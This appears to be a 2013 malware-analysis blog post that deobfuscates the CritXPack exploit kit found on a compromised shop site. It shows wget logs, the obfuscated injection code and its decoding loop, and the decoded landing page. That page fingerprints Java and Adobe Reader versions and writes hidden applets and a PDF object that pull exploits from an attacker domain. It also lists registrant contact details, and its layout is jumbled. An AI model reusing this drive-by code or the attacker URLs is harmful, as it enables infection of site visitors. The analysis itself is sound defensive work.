Some De-obfuscation notes on CritXPack Exploit Kit at root(.)kaovo.com
13 Jan 2013 This is a quick memo of a crusade event, our encounter notes with CritXPack Exploit Kit, I think this will help others, so I dare to make documentation of the findings here as a guide. This is actually based on my memo so please bear the brief & incomplete explanation here and there.Since we are focusing to the deobfuscation malware codes manually, I'm sorry that the payload information will not be included in this post (considering that the know-how on exploit kit's obfuscation is the target, thus the moronz can change the payload to anything they want anyway).
BTW, capture of the infected(?), I'd say an INFECTOR, site: (clean this up!)
The infector site's domain name is having Chinese registrant data:
Domain Name: kaovo.comOK. Enough for the teaser, we'll make it quick, so here we go:
Registrant Contact:
juxiangpin
xiangpin ju bestpa1@hotmail.com
telephone: +86.02088889929
fax: +86.02088889927
kandung jinyang jinyang kandung 800267
CN
#MalwareMustDie!
Starts with the below spam url:h00p://www.themabbutt.com/index.php?cPath=24We fetched the index.php:Resolving www.themabbutt.com... seconds 0.00, 74.200.90.212It has the double obduscation code in the end of the file: ↑Both the the obfuscation code has the same structure below:
Caching www.themabbutt.com => 74.200.90.212
Connecting to www.themabbutt.com|74.200.90.212|:80... seconds 0.00, connected.
:
GET /index.php?cPath=24 HTTP/1.0
User-Agent: MMD Crusader
Host: www.themabbutt.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2013 08:15:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: osCsid=3f7fdcd550948f798d34ba0630c7f8c1; path=/; domain=themabbutt.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
200 OK
Length: unspecified [text/html]
17:15:14 (44.68 KB/s) - `index.php' saved// the obfuscation data:Use the ↑above logic & both obfs code will be burped deobfs code below: The second url will forward you to google, but - the first link's url if we download the source & see the inside, it contains the suspicious link as per below: I fetched it like this:
if(1)
{ f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,1
105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,
97,139,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,
6,9,124,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,
:
// and the deobfuscation generator code:
for(i=0;-i+628!=0;i+=1)
{ j=i;
if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w「j」+j%4));
}--17:21:10-- h00p://root.kaovo.com/n121212p/awsxd/i.php?token=speed/After some "fun" effort receiving 302, finally we received the 1.php
=> `i.php@token=speed%2F'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/i.php?token=speed/ HTTP/1.0
Referer: h00p://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader Agent
Host: root.kaovo.com
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:$ ls -alF i.phpPS, here's the server's headers:
-rwx------ xxxx xxxx 2644 Jan 12 21:58 i.php*
MD5: 39583fcb535d2925a5000f4b8deae64aServer: nginx/1.1.14A fail/blocked attempt will pass you to download yandex.ru's cookies:
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14HTTP/1.1 302 Found
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Location: h00p://www.yandex.ru/robots.txt
Vary: Accept-EncodingThe Landing Page Script
The i.php file contains 2 lines of the obfuscation script. It is the landing page of CritX Exploit Kit Let's make it more "viewable" structure :-) With the below explanation:1. The pd.js is the PluginDetect 0.7.9 used to guard the pages of this EK. unlike the other EK, it is in seperated download and shared to other infector files. 2. The obfuscation code is found in the script, after passed checks on pd.js, it was a packed script as per shown in line 9. 3. There is a direct download infector in line 14 w/meta refrash tag method. 4. The moronz put the variable used for deobfuscation in other part (line 18).Let's see the PluginDetect used:--17:30:05-- h00p://root.kaovo.com/n121212p/awsxd/js/pd.jsThis is the inside, a one line script, hello PluginDetect 0.7.9
=> `pd.js'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/js/pd.js HTTP/1.0
Referer: http://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader
Host: root.kaovo.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:29:56 GMT
Content-Type: application/javascript
Content-Length: 28592
Connection: keep-alive
Last-Modified: Thu, 22 Nov 2012 06:59:46 GMT
ETag: "2e0a69-6fb0-4cf1003249c80"
Accept-Ranges: bytes
Vary: Accept-Encoding
:
200 OK
Length: 28,592 (28K) [application/javascript]
17:30:08 (15.12 KB/s) - `pd.js' saved [28592/28592]Decoding Obfuscation Infector Script
So how to decode the infector part? Let's see the good structure first: It is a simple structure, by feeding the generator by obfuscation data with eliminating garbages/unnecessary code we can get the deobfuscation script saved in the "e" variable here -->>[PASTEBIN] Seeing the codes, we'll see the infector is aiming to check your java version: (by fetching result from PluginDetect 0.7.9)var GfkghfHqFF9 = (PluginDetect.getVersion("Java") + ".").toString().split(".");And your pdf version (fetching result from PluginDetect 0.7.9)
if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 7) && (GfkghfHqFF9[3] < 9)){
Y9Nmp1nN7 = 7
}
else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 6) && (GfkghfHqFF9[3] < 33)){
Y9Nmp1nN7 = 6
}
else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] < 6)){
Y9Nmp1nN7 = 5
}
else {
Y9Nmp1nN7 = 0var bqeVOXhTg9n = (PluginDetect.getVersion("AdobeReader") + ".")["toString"]().split("." );The return value of 7, 6, 5, 2, 0 was used to trigger jars & PDF exploit file downloads described in the below functions:
if ((bqeVOXhTg9n[0] == 8) || ((bqeVOXhTg9n[0] == 9) && (bqeVOXhTg9n[1] < 4))){
selJdFtA = 2
}
else {
selJdFtA = 0 }// case of return code zero --->// redirected into YANDEX....↑The point is, three jars and a PDF exploit downloads are - the weapon of the current case of CritXPack Exploit Kit. The sample of these script infector are here --->>[MEDIAFIRE]Current infection landing page reference-1 at URLQuery -->>[URLQuery]Current infection's redirector reference-2 at URLQuery -->>[URLQuery]More CritXPack reference at Malware don't need Coffee -->>[HERE][UPDATED]*) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @MalwareSigs *) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @Set_Abominae
if ((selJdFtA == 0) && (Y9Nmp1nN7 == 0) && (b3RSQGB84 == 0)){
document.location.href = "h00p://root.kaovo.com/n121212p/awsxd/jpfoff.php?token=%64%65%66%61%75%6c%74&"
}
if (Y9Nmp1nN7 == 5){ // case of "5" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="a.Test" archive="j15.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXO5" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-tApXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')
}
if (Y9Nmp1nN7 == 6){ // case of "6" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="a.Test" archive="j16.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYF" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-trpXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')
}
if (Y9Nmp1nN7 == 7){ // case of "7" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="E" archive="j17.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYl" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-t1pXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')
}
if (selJdFtA == 2){ //case of "2" pdf exploit download
document.write('
<div style="visibility:hidden">
<object type="application/pdf" data="lpdf.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYxLk&" width="10" height="10">
</object></div>')}